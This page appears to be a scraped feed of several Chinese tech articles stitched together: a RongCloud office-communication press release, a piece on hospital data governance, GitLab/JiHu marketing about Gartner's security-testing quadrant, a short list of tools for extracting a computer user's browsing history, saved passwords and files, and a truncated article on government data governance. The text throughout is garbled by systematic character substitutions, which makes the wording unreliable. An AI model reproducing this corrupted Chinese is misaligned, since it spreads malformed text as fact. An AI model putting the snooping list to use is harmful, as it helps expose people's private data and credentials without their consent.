针对政企客户跨域工作协同难、通信安全保障难、办公合作效率低等诸多问题,融云为包含政府、党建、金融等在内的不同企事业单位,提供了场景化的协同办公通信解决方案。 融云协同办公解决方案,具备即时通讯、实时音视频和利用工作台三大外围能力,可能与 OA、邮件、CRM 及对立认证等第三方零碎疾速集成,买通办公内循环,帮忙政企客户打造一个集音讯核心、会议核心和工作核心于一体的挪动化办公平台,进步协同办公效率,升高经营保护老本,避免政企秘密外泄,赋能员工和团队。同时,为了满足政企客户对协同办公产品的国产化需要,融云已全面适配国产化 CPU、操作系统、数据库及中间件等,并紧跟国产化资源厂商脚步,一直裁减适配库,提供国产化解决方案,赋能政企客户打造国产化通信中台,实现业务自主可控。 除政务办公、企业办公外,融云协同办公解决方案还在智慧金融、智慧城市等场景中施展重要赋能作用,帮忙客户构建“数智化”的通信交互底座。截至目前,融云已为全国 2000+ 国家政府机关、企事业单位和各行业用户提供服务。 此次,融云积极参与中国信通院“铸基打算”,参编《办公即时通信软件平安规范》,将与其余参加单位独特推动中国办公通信软件行业向专业化、标准化继续衰弱倒退,用数字技术赋能行业成长,为政企数字化转型提供真正的价值和助力。

May 9, 2022 · 1 min · jiezi

关于安全:一文详解医疗机构数据治理六大核心环节亿信华辰

近几年来,医疗机构的数字化过程显著放慢,机构内的信息系统越来越多、电子病历一直遍及、各方面业务的数字化根本实现……与之相随同而来的,是海量待开掘利用的数据。 艾瑞征询公布的《2022年中国医疗信息化行业钻研报告》指出,现阶段我国整体医疗数据利用程度较低。三级医院具备根底的数据资源整合和利用能力,但对于数据进一步的剖析解决能力还有待增强;而三级以下医院超过半数未发展对于医疗数据的利用业务,且整体利用能力较之三级医院有较大差距。医疗数据利用难,成为了横隔在医疗机构数字化过程中的一道难题。01、为何医疗数据利用难? 1.医疗大数据自身简单 医疗衰弱大数据次要可分为四大类:①诊疗辅助类:包含亚健康及患病人群通过医疗机构、第三方测验机构或网络平台参加病情的征询、预约、诊断、医治等过程所产生的医疗数据。②衰弱监测类:指基于挪动物联网对集体身材体征及日常行为进行监测的生命体征类数据,常被利用于慢性病患者的自我管理。③公共卫生类:次要指区域性的医疗服务平台、公共卫生信息系统等产生的医疗数据。④定向生物医学类:次要是对于新药品研发、生物标本和基因测序的信息,多利用于共性诊疗、精准医疗、临床药物试验等医学钻研。因为这4类数据起源以及作用成果简单,而且局部医疗数据带有主观性质,医疗信息存在显著的阶段性特色;再加之疾病的产生和倒退过程及医学影像、病理等信息有很强的工夫维度属性,床旁监护等仪器产生的数据也具备很强的时效性;信息孤岛、信息烟囱及疾病的多发性常导致医疗数据存在大量垃圾数据,如常见病病情形容、慢性病患者的重复性查看等,造成了医疗数据的冗余……这些医疗大数据的典型个性也为其治理利用加大了难度。 2.医疗数据孤岛化重大且不足规范体系 衰弱界研究院公布的《中国智慧医疗2021十大发展趋势预测》报告中指出,以后智慧医疗倒退中,亟待须要破解院内及院间的互联互通实现难、数据品质低两个要害技术难题。 因为信息系统技术规范、根底信息数据规范的不对立和缺失,间接导致了医疗数据品质低的问题,如数据不残缺,医疗记录有断点;信息用自然语言形容,自动化剖析解决艰难等,都导致这些数据无奈最大化利用。 且医院外部系统集成受制于医院零碎多元异构,医疗数据广泛不能互通互认,这也加剧了医疗行业的“数据孤岛”景象,数据跨平台不能齐全集成、互联互通及共享,数据价值难以失去较大水平施展。 然而,作为医疗机构高质量倒退的要害因素,无论是智慧医院建设,还是信息化规范建设,都离不开对大数据的利用。而要破解医疗机构数据利用难题,就须要从源头解决问题,通过数据治理,让数据从不可控、不可用、不好用到可控、不便易用且能赋能业务。 02、医疗机构如何做好数据治理? 医疗机构进行数据治理的过程,就是对其数据资产进行治理和管制,撑持并保障数据被平安高效地替换与利用的过程。下图是可参考的医疗机构数据治理体系。咱们接下来次要从6个外围环节来详解医疗机构如何做好数据治理。1.环节一:设立数据治理组织构造 设计健全的数据治理组织构造,是全面发展数据治理工作的根底。 医疗机构须要成立专门的数据治理或数据管理部门,实现流程和标准制订、数据质量保证和品质管制、流程审批等工作,并对数据应用方和IT设施建设方进行治理。目前,诸多医院曾经专门成立了大数据部门承当这项工作,也有医院将这项工作放在信息科或病案管理室。 2.环节二:制订数据相干流程标准 制订清晰的数据相干流程标准,有助于帮忙实现以下指标:数据有明确和精确的定义;数据有明确的责任方;数据有清晰的存储形式与正当的工夫期限;数据加工办法清晰;数据拜访形式与管制明确;数据内容符合标准要求与品质要求。 医疗机构的数据标准,次要从上面这三个方面来制订。 (1)信息标准信息标准蕴含隐衷、数据权限管控标准和品质评估标准等。医疗机构需重点关注这一部分标准的建设,保障医疗数据合规。 (2)数据标准数据标准包含不同业务零碎,如电子病历数据标准、医院信息系统数据标准。对于数据整合过程和整合后的零碎来说,须要主数据和元数据标准以及相干的数据品质标准。 (3)流程治理标准流程治理标准规定了何人在何种利用场景下,通过何人的审批能够操作何种类型的数据。相比数据采集、加工与存储的流程,数据应用流程的制度治理更为重要,比方何种职责的科室和医生在什么情景下能够导出数据、数据是否离院、应由哪一级来审批决定,这些都须要具体规定。除治理标准外,不同角色的人员如何合作互动实现既定的工作,也可通过制订流程撑持标准实现。3.环节三:搭建数据规范体系 要保障医疗机构各业务部门、零碎间的数据的规范性、流通性和共享性,就要搭建对立的数据规范体系。数据治理相干规范分为基础性和应用性规范,包含数据定义与分类(元数据)、主数据、参考数据(数据字典)、数据模型、治理与技术类、品质评估类等内容。数据治理工作组成员以及业务组人员可参考已有规范,并与现有医疗系统、业务流程相结合,发展医疗衰弱大数据规范体系的建设、施行、批改等工作。 目前,我国针对医疗大数据的相干技术标准正在逐渐建设,国家卫生衰弱委员会相继出台了多项管理制度,如2018年颁布的《对于印发大数据规范、平安和服务治理方法(试行)的告诉》国卫布局发[2018]23号,《对于印发全国医院信息化建设规范与标准(试行)的告诉》国卫办布局发〔2018〕4号,《国家卫生衰弱委办公厅对于印发全国医院数据上报治理计划(试行)的告诉》国卫办布局函〔2019〕380号等文件,在医疗大数据采集、加工、存储共享等方面进行了标准,充分发挥了标准化在医疗数据治理、利用和倒退过程中的引领作用。 4.环节四:元数据管理 针对医院信息系统中存在的数据模式形容文档不全、零碎之间数据关联不清晰、零碎值域规范不对立等问题,进行元数据管理,是获取业务零碎中数据的含意,辅助数据了解,减少剖析的麻利的重要伎俩。 与其余畛域相比,医疗畛域的元数据标准绝对比拟成熟。如原卫生部颁布的《国家卫生计生委办公厅对于印发住院病案首页数据填写品质标准(暂行)和住院病案首页数据品质治理与管制指标(2016版)的告诉》(国卫办医发〔2016〕24号)、《病历书写标准》(卫医政发〔2010〕11号)、《电子病历根本标准》(卫医政发〔2010〕24号)、《卫生信息根本数据集编制标准》(WS 370-2012)、《卫生治理根本数据集》(WS374-2012)与《电子病历根本架构与数据规范》(卫办发〔2009〕130号)等。 在数据值编码标准方面,国内上有疾病分类编码ICD-10、手术操作编码ICD-9以及SNOMED术语库,国内有国家标准《卫生机构(组织)分类与代码表》(WS2182002)、《社会保险药品分类与代码》(LD/T90-2012)和《西医病证分类与代码》(GB/T15657-1995)。 然而,在应用过程中,这些规范会依据利用进行不同水平的删减和裁减,甚至呈现谬误的应用。因而,基于规范建设一个元数据管理系统,可不便地在规范上裁减,并能够关联不同的利用。 元数据管理系统次要由采集层、规范层、剖析层和利用接口层组成。采集层从各种医疗信息系统内获取元数据,查看元数据的变动和更新。规范层保留了元数据的标识信息、内容信息与模式信息等。因为医院信息系统各异,规范层实现了将元数据映射到规范汇合以及将不同的元数据进行互操作的性能。剖析层次要提供了对元数据的治理、剖析与查问。元数据库与数据源存在对应关系,当用户通过对立入口提交查问服务时,能够依据元数据库提供的特色找到对应的信息资源,重组之后出现给用户。因而,利用接口层除了提供元数据拜访的限度和爱护外,同时还服务于各个应用程序。 5.环节五:主数据管理 在构建主数据管理库时,首先须要从多个异构的业务子系统中以ETL的形式抽取要害数据,而后,利用元数据库对其中的编码、形容进行标准化。接着,因为多个业务零碎的数据可能不统一,还须要通过匹配算法实现对数据的谬误打消和信息交融。对于匹配不到的孤立信息,要加以监控跟踪,进行人工解决。同时,以增量学习的形式不断改进匹配算法。最初,将归整好的主数据信息存入主数据库。医疗数据的主数据次要有病人信息和医生信息两类。以病人信息为例,病人的出生年月、性别等信息在各零碎中都有,但因为医院信息系统是从身份证读取的信息,因此相比其余零碎采纳人工录入的形式来说更精确。然而,病人的血型信息通常在实验室信息管理系统中是更精确的,甚至可能在门诊/急诊工作站中也没有这些信息。通过主数据管理系统,能够从各零碎中别离获取信息,依据可靠性、统一率等进行信息校验交融,最初造成该病人的齐备信息,而后再将齐备信息下发到各业务零碎。 此外,在多家医院之间实现主数据独特治理之后,还能够买通医院之间的信息壁垒。若患者在A医院诊断出患有某慢性病,当他下次去B医院就诊时,医生也能疾速得悉该患者的这个信息,从而使就诊更高效、更精确。 6.环节六:数据品质治理 医疗数据品质问题次要来源于3个方面。 ①原始信息采集有误差。在医疗系统内数据采集次要通过手工形式录入,在医生或护士输出信息的过程中,可能会无意或无心地将数据谬误引入零碎。②数据交融过程产生问题。在对不同起源的数据进行交融时,数据格式和语义可能会有误差或不统一,导致交融后果有错。③与数据的利用场景不匹配。例如,如果要进行病例统计,现有临床电子病历数据就能满足统计场景的需要。但如果要做大肠癌疗效剖析,现有临床电子病历数据就难以满足剖析场景的要求,还需补充病理数据。所以,对数据品质的管控,次要从三个方面来进行:数据品质实时监控、数据品质评估以及数据主动修改。 (1)数据品质实时监控次要针对从业务零碎抽取的或是从内部传送的接口数据,通常从及时性、有效性和完整性等几个指标监测接口内容自身的数据品质问题,还须要对采集程序进行监控,如接口采集程序是否失常启动、是否失常完结等。 (2)数据品质评估是指对交融后的数据进行品质评估。首先从确定评估对象和范畴着手,而后选取数据品质维度及评估规范,确定品质测度及评估办法,之后依照配置的评估指标执行评估,产生权重化的评估后果,最初生成品质后果和报告。 (3)数据主动修改是指对于有谬误或不统一的数据,局部数据能够进行自动化的探测和更正。例如,工夫的表白能够是DD/MM/YY,也能够是YY/MM/DD,能够通过智能算法探测原始零碎的表达方式,制订映射规定,实现日期格局的一致性。 03、小结 通过30多年医疗信息化建设,医疗机构的数据量及其复杂性连年攀升,医疗行业的关注焦点曾经从信息系统建设延长到了数据资源管理和利用。 而要实现数据资源的无效利用,数据治理是关键环节。只有做好数据治理,让数据利用无效撑持医院倒退,能力进一步提高医院管理水平,实现数据对医疗业务倒退的价值赋能。

May 7, 2022 · 1 min · jiezi

关于安全:安全领导力|-GitLab-持续位列-Gartner-AST-魔力象限

Gartner 在四月下旬公布了 2022 年应用程序平安测试(Application Security Testing,简称 AST)魔力象限,GitLab 位列挑战象限。 Gartner AST 魔力象限Niche Players(利基)处于利基象限的厂商,通常都是绝对胜利地专一于一个小的细分市场或垂直行业。都是关注功能性或特定畛域,亦或新成立的公司。 Visionaries(有远见)*处于有远见象限的厂商,可能理解市场的倒退方向,或对扭转市场规定有远见,但还没有比拟好的执行力,或执行力不统一。 Challengers(挑战者)处于挑战者象限的厂商,有很强的执行力,而且有可能在一个大的细分市场上占主导地位,而且足以对于领导者象限的厂商形成严重威胁,这些厂商往往具备弱小的弱小产品以及足够可信的市场位置和资源来维持持续增长,然而没有可与领导者象限相媲美的规模和影响力。 Leaders(领导者)处于领导者象限的厂商,有很强的执行力,且具备推动新技术被承受所需的市场份额、可信度以及营销和销售能力,是创新者和思维首领。 GitLab 位于挑战者魔力象限Gartner 4 月下旬公布了 2022 年 AST 魔力象限,GitLab 位于挑战者象限: 报告中对于 GitLab 有如下形容: 该供应商的 AST 产品--包含SAST、密钥检测和依赖扫描,是其旗舰版性能,但价格是通明的。此外,SAST 和密钥检测也是 GitLab CE 版的一部分。因为 GitLab 提供了 AST 运行的开发环境,且提供了许多选项,能够讲平安和合规的实际贯通到整个开发过程中。比方,任何一个破绽告警都会展现在开发者的 MR 中,能够通过配置 Pipeline 来对主/默认分支进行扫描以辨认存在安全隐患的组件。GitLab 提供容器扫描,包含针对 SCA 破绽的主动修复。得益于 GitLab 的自动化能力,其含糊测试的能力是细化而且易于应用的,并且对于专业知识的要求并不高。极狐GitLab vs GitLab极狐GitLab是以“中外合资3.0”模式创建,领有GitLab在国内独家且永恒的技术受权及知识产权受权,独立提供极狐GitLab一体化DevOps平台发行版(公有部署与SaaS服务版本),公司齐全由中国本地团队经营,领有本地自主研发权。极狐GitLab和 GitLab 除了具备等同性能外,极狐GitLab 还具备以下劣势: 数据安全极狐GitLab所有的基础设施(网络、服务器、存储等)都在国内,而且在数据保护、合规和隐衷爱护以及身份/权限治理方面做了很多工作,并且通过了网络安全等级爱护 2.0 三级评测。严格听从《网络安全法》、《数据安全法》、《个人信息保护法》。 本土化的服务极狐GitLab的所有反对团队都在国内,可能为国内用户提供更好的服务 多样化的服务获取形式极狐GitLab 有多种渠道来向用户传递极狐GitLab 的声音,同样地,用户也能够通过多种渠道参加到极狐GitLab相应的流动中来。比方微信群、在线直播、线下 Meetup 等。 多措并举,助力开源倒退极狐GitLab有针对高校的教育公益打算,符合条件的高校都能够提出申请,在审核之后就能够享受相应的权利;针对“专、精、特、新”国家政策培植的科技类企业,能够申请加入极狐GitLab初创企业将来独角兽打算;针对国内开源倒退,极狐GitLab 推出了极狐GitLab 开源我的项目公益反对打算。 极狐GitLab DevSecOps极狐GitLab 的平安能力是内置且开箱即用的,用户无需装置配置、保护第三方工具即可应用。目前具备容器镜像扫描、动态利用平安测试 (SAST)、动静利用平安扫描(DAST)、密钥检测、License合规、依赖项扫描以及含糊测试等平安性能。所有平安性能可能和极狐GitLab CI/CD 无缝集成,帮忙用户真正做到“平安左移“和”平安继续自动化“。为了帮忙更多用户可能直观感触极狐GitLab DevSecOps 性能,极狐GitLab 团队特意录制了 DevSecOps 相干的视频,登陆地址 https://about.gitlab.cn/demo 即可进行观看: ...

May 7, 2022 · 1 min · jiezi

关于安全:通过电脑了解你的一切你的隐私不安全

上面大部分软件基于window环境 每天开关机工夫 // 零碎自带事件查看器,或者LastActivityView一天之中关上过哪些程序、和文件 // LastActivityView浏览过哪些网页,长时间来浏览网页的数据分析(每天浏览网页的数量,最常登陆的几个网站,某个网站浏览的所有记录) // 浏览器历史记录+搜寻+浏览器插件 Better History搜寻过的所有关键字 // 浏览器历史记录+搜寻保留在浏览器中的所有明码 // LastPass, 或者chrome自带的记录器软件安装时间,应用频率扫描出电脑中所有的图片(蕴含QQ聊天记录图片等,能够精准定位电脑内所有含有人头的图片) // picase疾速找到电脑中所有类型的文件(word,exe,xls,mp4,mp3,mov,pdf) // everything看过哪些视频(网页版+客户端) // everything,VideoCacheView缓存视频听过哪些歌曲(客户端) // everything打字速度与习惯,一天当中打字的数量 // 搜狗输入法记录之前删除的一些文件 // 文件复原电脑系统安装时间 // 鲁巨匠

May 4, 2022 · 1 min · jiezi

关于安全:Web安全之基础信息收集

一、背景最近系统性学习了web平安,趁着放假这段时间做个梳理,顺便分享进去给大家做个参考 二、根底信息收集根底信息收集包含了:IP、域名、端口 2.1 IPIP收集是把域名对应的IP收集起来,次要的收集办法有几种 通过ping 通过下面的图能够看出曾经取得对方域名对应的ip 通过第三方网站获取指标ip在kali零碎下 dig+域名就能够取得该域名的IP地址 2.2域名次要域名收集办法有几种 1.DNS查问 在kali零碎下输出 dnsenum+网址就能够取得该网站的域名 2.在线网站查问 通过网址http://whois.chinaz.com/,查问企业网址就能够获取相干公司域名 2.3 端口次要端口收集办法有几种 1.windows 以管理员权限进入命令提示符下输出 netstat -anbo就能够显示凋谢的端口 2.nmap 在kali零碎下输出 nmap -A -v -T4 192.168.1.1就能够取得端口信息

May 2, 2022 · 1 min · jiezi

关于安全:常见WEB攻击与防御

作为一个web开发者,web平安是须要理解的,web攻打是针对用户上网行为或网站服务器等设施进行攻打的行为,如植入恶意代码,批改网站权限,获取网站用户隐衷信息等等。从互联网诞生起,网络安全威逼就始终随同着网站的倒退,各种web攻打和信息泄露也从未进行。本文介绍常见web攻击方式及预防措施。 XSS(跨站脚本攻打)CSRF(跨站申请伪造)SQL注入DDOSXSS跨站脚本攻打指攻击者在网页中嵌入歹意脚本,当用户关上网页时,歹意脚本开始执行,盗取用户cookie,用户名明码等信息 比方在一个公布内容零碎中,攻击者在内容中嵌入相似的代码<script>window.open('www.xxx.com?param=' + document.cookie)</script>,当用户拜访这个页面的时候,就会执行恶意代码,该用户的cookie就会被发送到攻击者的服务器。 预防措施: 将重要的cookies标记为http only,这样JavaScript中的document.cookie语句就不能获取到cookie了;只容许用户输出咱们冀望的数据,如年龄的textbox中只容许输出数字,其余过滤;对数据进行Html Encode解决,如<转化为&lt;、&转化为&amp;过滤或移除非凡的Html标签,如:script、iframe;过滤JavaScript事件的标签,如“onclick=”、“onfocus”等。CSRF跨站申请伪造指通过盗用用户信息以用户的名义向第三方网站发动歹意申请,盗取账号,转账,发送信息,删除数据等 用户登录信赖站点A -> 未退出拜访歹意站点B -> 从站点B发动拜访站点A的歹意申请预防措施: Cookie设置HttpOnly,JS就无奈读取到cookie中的信息,防止攻击者伪造cookie的状况呈现。不应用cookie验证,改token形式验证通过referer辨认,验证页面是否是信赖站点SQL注入SQL注入攻打是指把SQL语句伪装成失常的http申请,坑骗服务器执行歹意的SQL语句,达到入侵目标。 ' or '1'= '1。这是最常见的sql注入攻打,当咱们输出用户名 jiajun ,而后明码输出'or '1'= '1的时候,咱们在查问用户名和明码是否正确的时候,原本要执行的是select * from user where username='' and password='',通过参数拼接后,会执行sql语句 select * from user where username='jaijun' and password=' ' or ' 1'='1 ',这个时候1=1是成立,天然就跳过验证了。然而如果再重大一点,明码输出的是';drop table user;--,那么sql命令为select * from user where username='jiajun' and password='';drop table user;--' 这个时候咱们就间接把这个表给删除了预防措施: 对进入数据库的特殊字符('"\尖括号&*;等)进行本义解决,或编码转换。在利用公布之前倡议应用业余的SQL注入检测工具进行检测,以及时修补被发现的SQL注入破绽。网上有很多这方面的开源工具,例如sqlmap、SQLninja等防止网站打印出SQL错误信息,比方类型谬误、字段不匹配等,把代码里的SQL语句裸露进去,以避免攻击者利用这些错误信息进行SQL注入。DDOS分布式服务攻打,借助公共网络,将数量宏大的计算器设施(肉鸡)联结起来,对一个或多个指标动员攻打,从而达到瘫痪指标主机的目标。 SYN Flood ,简略说一下tcp三次握手,客户端先服务器发出请求,申请建设连贯,而后服务器返回一个报文,表明申请以被承受,而后客户端也会返回一个报文,最初建设连贯。那么如果有这么一种状况,攻击者伪造ip地址,收回报文给服务器申请连贯,这个时候服务器接管到了,依据tcp三次握手的规定,服务器也要回应一个报文,可是这个ip是伪造的,报文回应给谁呢,第二次握手呈现谬误,第三次天然也就不能顺利进行了,这个时候服务器收不到第三次握手时客户端收回的报文,又再反复第二次握手的操作。如果攻击者伪造了大量的ip地址并发出请求,这个时候服务器将保护一个十分大的半连贯期待列表,占用了大量的资源,最初服务器瘫痪CC攻打,在应用层http协定上发动攻打,模仿失常用户发送大量申请直到该网站拒绝服务为止。DNS query flood 攻击者伪造大量有效域名,发送给指标服务器解析,这些域名均为有效域名,导致DNS服务器耗用大量资源去解决这些有效域名,造成DNS解析域名超时,达到攻打目标。预防措施: 减少带宽,然而带宽十分低廉异样流量的荡涤过滤过滤不必要的服务和端口高防智能DNS解析部署CDN总结以上只是列举了常见的web攻击方式,都是比拟常见的web平安话题,以及一些防备计划理论开发过程中还会遇到很多平安问题,对于这些问题,咱们都不可漠视,服务器上任何一个利用的破绽都有可能是黑客攻陷服务器的突破口。除上述常见的几种形式,还有很多web平安话题,有趣味的同学能够持续钻研。 专一前端开发,分享前端相干技术干货,公众号:南城大前端(ID: nanchengfe)

May 1, 2022 · 1 min · jiezi

关于安全:移动办公安全告急融云-x-海泰方圆给即时通讯加把安全锁

据媒体报道,某市市委组织部工作人员曾某,收到下级单位下发的一份告诉文件,要求紧急传播落实。因须要阅办的领导外出不在,曾某为尽快将文件传播到位,遮蔽文件密级标记进行扫描,将电子版发送至单位微信工作群,后果造成敏感信息外泄。关注【融云 RongCloud】,理解协同办公平台更多干货。 这样的新闻举不胜举。后疫情时代,挪动办公成为常态,政企机构也在逐渐推动政务挪动化转型。用手机随时随地办公和沟通的确很不便,但业务流程和沟通中往往会波及到秘密或敏感信息,平安和窃密如何失去保障?对于处于要害畛域的政企机构来说,“安全性”成为即时通讯工具选型最重要的考量因素。 1+1>2在此背景下,平安·可信的寰球互联网通信云服务商【融云】,与当先的商用明码综合解决方案提供商【海泰方圆】,在挪动办公与平安通信应用领域,联手推出新一代平安即时通讯零碎——虎讯。它包含通信安全与数据存储平安两局部。通信安全次要通过加密通信链路来实现,数据安全次要通过数据加密存储与数据存储隔离来实现。加密过程应用的算法均为 SM2、SM3、SM4 国产商用明码算法。 该即时通讯零碎,以【融云】挪动即时通讯能力为底座,联合国产商用明码算法对信息进行加密爱护。为高平安诉求的政企客户,提供一个集文本平安、语音平安、视频平安、闪信/阅后即焚等性能于一体的高平安通信平台。针对平安数据、平安语音、平安视频三大利用场景,平台通过根底平安通信零碎+第三方 OA 利用相结合的形式,真正实现了挪动办公平安、自主、可控;除此之外,还可提供笼罩“端-边-网-云”一体化的挪动办公信息安全爱护,无效解决政企用户在挪动办公中的信息安全问题,为政企高效、平安工作保驾护航。 给视频会议零碎加个防护罩挪动办公期间,视频会议必不可少。不过热门视频会议软件 Zoom 的网络课堂或会议现场曾闯入很多不请自来,他们冲入网络直播间或高喊不当舆论,或上传色情图片,给参与者特地是青少年带来极大困扰。而这类“劫持”失常网络会议、肆意捣鬼的行为还衍生出了新的风行词 “ Zoom 轰炸”。 人们天然要问,以后市面上各类视频会议软件还能平安应用吗?【融云】与海泰方圆联合推出的平安视频会议零碎,依靠【融云】实时音视频 SDK 高质量的互动能力,通过语音降噪技术、回声打消技术、主动声音增益、网络带宽自适应、自适应抖动缓冲管制、丢包弥补+前向纠错 NACK/FEC 等技术提供清晰晦涩的音视频成果,音视频客户端目前音频最高可抗 80% 丢包,而视频在 60% 丢包状况下,仍然可用。再配合【海泰方圆】突出的明码能力、数据安全能力及个人信息(隐衷)爱护能力,为会议的信息安全进行全程保驾护航,让入会更不便,散会更平安。 另外,平安视频会议零碎除了提供音频传输、视频传输、屏幕共享、成员治理、会中聊天等基本功能外,还提供丰盛的会议治理性能,可帮助会议主持人疾速进行会中管控。部署形式是否灵活多样也是考验零碎能力的根底之一,针对这个需要,【融云】可依据用户多样化需要进行个性化定制,Android、iOS、Web、Windows、MacOS、国产化平台已实现多端笼罩,满足客户全方位的体验需要。 性能平安视频会议特色性能 加密即时通信:反对文字、语音、图片、视频、文件、表情、名片、地位分享等多种类型数据的加密传输。2 加密音、视频通话:反对点对点语音通话、视频通话、多人电话会议,做到全程实时加密。平安文档:反对对重要文档加密后发送,只有指定的接管刚才能关上浏览,反对转发权限管制、浏览与流传轨迹记录,浏览界面内嵌水印,做到泄密可追究。告诉布告:反对向所有或指定用户发送工作告诉,如告诉布告、工作工作等的对立推送,可发送文字、图片等告诉内容,并且显示浏览回执(已读/未读),可对未读人员进行二次揭示。阅后即焚:反对文字、图片、语音音讯的阅后即焚与听后即焚。平安文档:反对防截屏、录屏性能,确保终端数据安全。平安技术层面确保系统安全高效 首先,针对服务端开明端口限度,数据库限度源地址拜访,关注重大高危破绽信息,被动提供相应修复计划等。其次,针对客户端提供通信层组件代码混同晋升客户端被反编译难度,客户端本地不长久化存储 APP 级全局敏感信息等。最初,稳固的后盾架构,依靠于底层扩容策略和负载策略,可反对多路高清音频/适配并发接入的能力,随时随地开启音视频会议。将来,【融云】也将持续秉持凋谢单干、继续翻新的精力,携手更多合作伙伴,进一步加大科技投入、增强外围能力建设,为党政、金融和大型企业客户及各新技术、新场景提供业余的平安的通信解决方案及服务。

April 30, 2022 · 1 min · jiezi

关于安全:亿信华辰政务行业数据治理存在哪些问题该如何应对

家喻户晓,大数据、云计算等新一代信息技术作为重要的基础性策略资源,正引领着新一轮的科技翻新和改革,带来新的政府治理理念,同时也必将为将来政府治理构造、治理形式和治理过程带来新的时机。其中政务数据治理正成为数字政府和智慧城市建设的要害一环。政务数据治理是数据治理在政务行业的利用,解决政务数据归集、数据资源建设、数据共享和数据利用等各种问题,以保障数平安。 目前,政府部门积攒了海量的数据资源,但因为数据孤岛的存在而停留在碎片化数据阶段。同时,随着物联网、5G、空间信息技术等新一代信息技术的飞速发展,政府部门须要解决的数据量呈爆发式增长、数据起源和模式也更加多元化。因而政务数据治理成为洞察和开掘数据价值的最重要伎俩。 明天小亿就来说说政务行业如何借助大数据晋升价值,且政务行业的数据治理过来的倒退历程是怎么的?以及以后政务数据治理存在哪些问题,该如何应答? 01、政务行业如何借助大数据晋升价值 数据对于社会整体的意义,已不仅仅是信息技术提高的衍生品,而是信息时代推动社会提高与倒退的重要基石。对政府部门来说,借助大数据晋升价值次要体现在以下三个方面: 1.政务服务方面 政府使用大数据施政能够精确判断不同群体、不同市场主体的各种需要,晋升政府部门行政审批的效率和公共服务的品质,让数据为老百姓“跑腿办事”,为企业“贴心服务”,从而实现更无效的“管”、更踊跃的“放”。例如,各省市推广的“最多跑一次”就是通过推动“多审合一”“多测合一”“多评合一”“多证合一”“证照联办”等,从制度层面推动“流程优化、业务协同”。2.市场监管方面 政府管理者能够通过对海量数据的深刻开掘与剖析汇总,全面理解和精确把握市场经济信息,综合剖析经济社会发展趋势,一直进步市场监管的效率和品质。与此同时,也意味着所有信息数据都能在一个零碎平台内查问。换句话说,政府行为就更容易受到监督,从而无效促使政府负面清单、势力清单和责任清单的透明化治理。 3.产业疏导方面 政府能够通过出台优惠政策推动大数据产业又好又快倒退,塑造残缺大数据产业链,以“翻新驱动、转型倒退”为主线,一直晋升大数据产业的自主创新能力。同时,着力增强大数据施政的基础设施建设,踊跃向市场购买大数据的相干技术和服务,推动政府、智库、企业之间数据信息资源的利用整合和协同共享。 02、政务数据治理的3个倒退阶段 政务数据治理体系是围绕政府大数据治理工作而构建的蕴含多项要害域及形成因素的有机整体。次要包含针对政务大数据制订标准规范和平安保障体系,实现跨部门跨层级数据汇聚和共享,增强数据管理,进步数据品质,充分发挥数据资源价值,辅助政务决策、业务剖析和监督预警。 政务数据治理体系的倒退从顶层布局、机构设置、零碎建设和数据品质等角度看次要经验了三个倒退阶段。 1.初步摸索阶段 21世纪初期,人们对政务数据还不够器重。政府IT建设的重点是IT技术和业务性能的实现,并不是以数据为核心的建设,对政务数据的意识还停留在十分浅显的阶段。这个期间不足政务数据治理的办法和相干技术,政府部门对数据品质的器重水平也远远不够,数据品质较差,这也减少了后续跨部门数据汇聚整合的难度。 对于政务数据的治理和存储,也处于比拟初始化的阶段,数据存储扩散无序,不存在专门数据管理和归口部门,采集的数据也次要用于展现,很少进行数据分析和开掘,数据应用和利用效率较低,这个期间的数据存而未治、治而未用的景象普遍存在。2.成长丰盛阶段 这一时期社会对政务数据的意识一直加深,政府部门开始器重数据的品质和数据的价值,数据的收集和应用开始进行有目标的布局,并对数据进行有打算的治理。数据已被政府部门盲目地当作辅助治理和决策参考的工具。 且数据存储于扩散的业务信息系统中,具备初步的数据标准化能力,文件的存储具备对立的格局。然而,该期间数据从业人员大部分精力还是用于数据保护、数据荡涤、利用数据造成剖析报告,数据分析开掘能力偏低,数据还未实现真正的价值开掘,相干的顶层设计和政策反对较少。 3.倒退落地阶段 在2016年以前,仅有大量省份对政务数据治理投以关注。从2016年开始,各省(区、市)出台的相干政策文件的数量显著减少。政府外部建设起专门的数据管理机构,设置相应的工作岗位,聘用业余人员,利用简单的剖析技术解决业务线或者机构的经营难题,政府还为数据从业人员提供职业倒退训练以及清晰的职业倒退门路。 目前数据的应用曾经贯通于政府治理各个领域、各个环节和各个过程之中,依数据决策、依数据管理、依数据监督已成为常态,政府治理和决策已离不开数据的撑持。同时,整个机构中都强调通过领导和治理来晋升数据品质。 03、政务数据治理存在的问题 只管政府对政务大数据治理的动机很强,然而以后政府在数据治理的实际中还面临着严厉的能力挑战和“成长的懊恼”,次要集中在政府数据治理的建设模型和施行门路还存在着思维意识碎片化与利用程度不低等问题。具体表现为: 1.数据烟囱林立,数据孤岛丛生 因为历史起因,宏大的政府机构都是各部门各自为政独立发展本单位信息化建设的,政务大数据无论是逻辑上还是物理上都是十分扩散的,大量雷同的信息还在不同的部门都被反复采集和存储,但格局各异,内容不一,所以在政府数据会集过程中, 存在“数据烟囱”林立,“数据孤岛”丛生等景象。 尽管以后政府各部门积攒的数据资源曾经很多了,实现对立和残缺的数据汇聚也是必须的,而聚哪些、怎么聚、去哪些、留哪些,在理论发展政务大数据治理工作中会遇到很多两难场面,各种难点也会很多; 2.数据分析过程中内外交融难,高低对接难 政府各项决策的数据分析过程中,因为须要综合汇总的结构化数据与非结构化数据混淆,数据品质不高,数据规范不对立,所以难以用对立的数据模型或者数据算法实现。在目前的政务数据资源扩散场面上,社会治理所须要的简略统计指标可能都难以齐全靠计算机自动化生成,依然须要大量的人工上报和汇总工作,客观存在政务数据分析过程中内外交融难、高低对接难等问题,这是对构建网络化、数据化、智能化的全天候在线的数字政府倒退方向的微小堵点; 3.数据管理工作无序化景象重大 政府数据管理和利用过程中,数据管理工作无序化景象重大,各政府部门重本单位须要轻跨部门兼顾要求,这困扰着政府数据治理的可继续倒退,要突破利益固化的体制壁垒,推动跨区域、跨层级、跨部门的数据平台建设在施行数字政府过程中,必然会对各部门的思维习惯和工作习惯造成微小冲击。 对立的数据规范和标准的数据管理也必须失去各部门高低的全力配合能力无效落地,治理则不可避免会让各部门感触微小的阵痛,而不治理则让社会治理智能化和数字政府无奈落地而长痛,长痛短痛都是切切实实存在的痛点。 04、政务数据治理的指标、技术流程、要害因素 1.指标 